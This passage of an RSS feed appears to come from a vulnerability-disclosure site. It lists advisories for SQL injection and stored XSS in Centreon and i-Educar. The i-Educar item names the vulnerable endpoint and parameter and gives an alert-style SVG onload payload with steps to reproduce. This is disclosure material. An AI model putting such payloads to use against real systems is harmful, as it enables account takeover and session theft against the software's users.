 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Mon, 05 Jan 2026 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-12514</title>
        <link>https://www.cvehunters.com/p/cve-2025-12514/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-12514/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-12514-sql-injection&amp;#34;&amp;gt;CVE-2025-12514: SQL Injection
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-12514&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-12514&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A user with elevated privileges is able to introduce a SQL Injection using the Open-tickets Notification rules configuration parameters.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Unauthorized access to sensitive data (e.g., users, passwords, logs).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Database enumeration (schemas, tables, users, versions).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Escalation to RCE depending on DB configuration (e.g., xp_cmdshell, UDFs).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Full compromise of the application if chained with other vulnerabilities.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;This issue affects all users and environments, as it does not require authentication and is reachable via a public endpoint.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-12514-sql-injection&amp;#34;&amp;gt;CVE-2025-12514: SQL Injection
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-12514&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-12514&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A user with elevated privileges is able to introduce a SQL Injection using the Open-tickets Notification rules configuration parameters.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Unauthorized access to sensitive data (e.g., users, passwords, logs).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Database enumeration (schemas, tables, users, versions).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Escalation to RCE depending on DB configuration (e.g., xp_cmdshell, UDFs).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Full compromise of the application if chained with other vulnerabilities.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;This issue affects all users and environments, as it does not require authentication and is reachable via a public endpoint.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://thewatch.centreon.com/latest-security-bulletins-64/cve-2025-12514-centreon-open-tickets-high-severity-5343&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://thewatch.centreon.com/latest-security-bulletins-64/cve-2025-12514-centreon-open-tickets-high-severity-5343&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Mon, 22 Dec 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-54890</title>
        <link>https://www.cvehunters.com/p/cve-2025-54890/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-54890/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-54890-cross-site-scripting-xss-stored&amp;#34;&amp;gt;CVE-2025-54890: Cross-Site Scripting (XSS) Stored
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-54890&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-54890&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A user with elevated privileges can inject XSS in the Hostgroups configuration page.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Session hijacking: Stealing cookies or authentication tokens to impersonate users.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Credential theft: Harvesting usernames and passwords using malicious scripts.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Malware delivery: Distributing unwanted or harmful code to victims.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Privilege escalation: Compromising administrative users through persistent scripts.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Data manipulation or defacement: Changing or disrupting site content.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Reputation damage: Eroding trust among site users and administrators.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-54890-cross-site-scripting-xss-stored&amp;#34;&amp;gt;CVE-2025-54890: Cross-Site Scripting (XSS) Stored
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-54890&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-54890&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A user with elevated privileges can inject XSS in the Hostgroups configuration page.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Session hijacking: Stealing cookies or authentication tokens to impersonate users.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Credential theft: Harvesting usernames and passwords using malicious scripts.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Malware delivery: Distributing unwanted or harmful code to victims.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Privilege escalation: Compromising administrative users through persistent scripts.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Data manipulation or defacement: Changing or disrupting site content.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Reputation damage: Eroding trust among site users and administrators.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://thewatch.centreon.com/latest-security-bulletins-64/cve-2025-54890-centreon-web-medium-severity-5342&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://thewatch.centreon.com/latest-security-bulletins-64/cve-2025-54890-centreon-web-medium-severity-5342&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Mon, 22 Dec 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-8460</title>
        <link>https://www.cvehunters.com/p/cve-2025-8460/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-8460/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-8460-cross-site-scripting-xss-stored&amp;#34;&amp;gt;CVE-2025-8460: Cross-Site Scripting (XSS) Stored
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-8460&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-8460&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Improper Neutralization of Input During Web Page Generation (XSS or &amp;#39;Cross-site Scripting&amp;#39;) vulnerability in Centreon Infra Monitoring (Notification rules, Open tickets module) allows Stored XSS by users with elevated privileges.This issue affects Infra Monitoring: from 24.10.0 before 24.10.5, from 24.04.0 before 24.04.5, from 23.10.0 before 23.10.4.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Session hijacking: Stealing cookies or authentication tokens to impersonate users.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Credential theft: Harvesting usernames and passwords using malicious scripts.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Malware delivery: Distributing unwanted or harmful code to victims.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Privilege escalation: Compromising administrative users through persistent scripts.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Data manipulation or defacement: Changing or disrupting site content.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Reputation damage: Eroding trust among site users and administrators.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-8460-cross-site-scripting-xss-stored&amp;#34;&amp;gt;CVE-2025-8460: Cross-Site Scripting (XSS) Stored
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-8460&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-8460&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Improper Neutralization of Input During Web Page Generation (XSS or &amp;#39;Cross-site Scripting&amp;#39;) vulnerability in Centreon Infra Monitoring (Notification rules, Open tickets module) allows Stored XSS by users with elevated privileges.This issue affects Infra Monitoring: from 24.10.0 before 24.10.5, from 24.04.0 before 24.04.5, from 23.10.0 before 23.10.4.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Session hijacking: Stealing cookies or authentication tokens to impersonate users.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Credential theft: Harvesting usernames and passwords using malicious scripts.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Malware delivery: Distributing unwanted or harmful code to victims.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Privilege escalation: Compromising administrative users through persistent scripts.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Data manipulation or defacement: Changing or disrupting site content.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Reputation damage: Eroding trust among site users and administrators.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://thewatch.centreon.com/latest-security-bulletins-64/cve-2025-8460-centreon-open-tickets-medium-severity-5344&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://thewatch.centreon.com/latest-security-bulletins-64/cve-2025-8460-centreon-open-tickets-medium-severity-5344&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Mon, 22 Dec 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-9638</title>
        <link>https://www.cvehunters.com/p/cve-2025-9638/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-9638/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-9638-cross-site-scripting-xss-stored-in-admin-panel&amp;#34;&amp;gt;CVE-2025-9638: Cross-Site Scripting (XSS) Stored in Admin Panel
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-9638&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-9638&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Stored Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;educar_usuario_cad.php&amp;lt;/code&amp;gt; endpoint of the i-Educar application. The issue arises because the &amp;lt;code&amp;gt;matricula_interna&amp;lt;/code&amp;gt; parameter is not sanitized before being stored in the database. Malicious scripts injected into this field persist in the system and are executed whenever the affected record is displayed in the web interface, leading to a persistent client-side compromise.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-9638-cross-site-scripting-xss-stored-in-admin-panel&amp;#34;&amp;gt;CVE-2025-9638: Cross-Site Scripting (XSS) Stored in Admin Panel
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-9638&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-9638&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Stored Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;educar_usuario_cad.php&amp;lt;/code&amp;gt; endpoint of the i-Educar application. The issue arises because the &amp;lt;code&amp;gt;matricula_interna&amp;lt;/code&amp;gt; parameter is not sanitized before being stored in the database. Malicious scripts injected into this field persist in the system and are executed whenever the affected record is displayed in the web interface, leading to a persistent client-side compromise.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;educar_usuario_cad.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameter: &amp;lt;code&amp;gt;matricula_interna&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-gdscript3&amp;#34; data-lang=&amp;#34;gdscript3&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;svg&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;/&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;onload&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;16&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;h3 id=&amp;#34;steps-to-reproduce&amp;#34;&amp;gt;Steps to Reproduce:
&amp;lt;/h3&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Log in with an account that can create or edit users.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Navigate to Configurações → Permissões → Usuários.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Create a new user or edit an existing one.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;In the Matrícula Interna field, insert the payload.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Save changes.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-9638/image.png&amp;#34;
	width=&amp;#34;1630&amp;#34;
	height=&amp;#34;851&amp;#34;
	srcset=&amp;#34;/p/cve-2025-9638/image_hu_cc7ec697ae4e70f7.png 480w, /p/cve-2025-9638/image_hu_555dd8de909d4f60.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;191&amp;#34;
		data-flex-basis=&amp;#34;459px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Open the affected user record.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;The payload executes immediately, confirming the stored XSS.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-9638/image-1.png&amp;#34;
	width=&amp;#34;1278&amp;#34;
	height=&amp;#34;689&amp;#34;
	srcset=&amp;#34;/p/cve-2025-9638/image-1_hu_2f16889c8f63d68d.png 480w, /p/cve-2025-9638/image-1_hu_e3a35d5e25fb0aad.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;185&amp;#34;
		data-flex-basis=&amp;#34;445px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Session hijacking: Stealing cookies or authentication tokens to impersonate users.&amp;lt;/li&amp;gt;
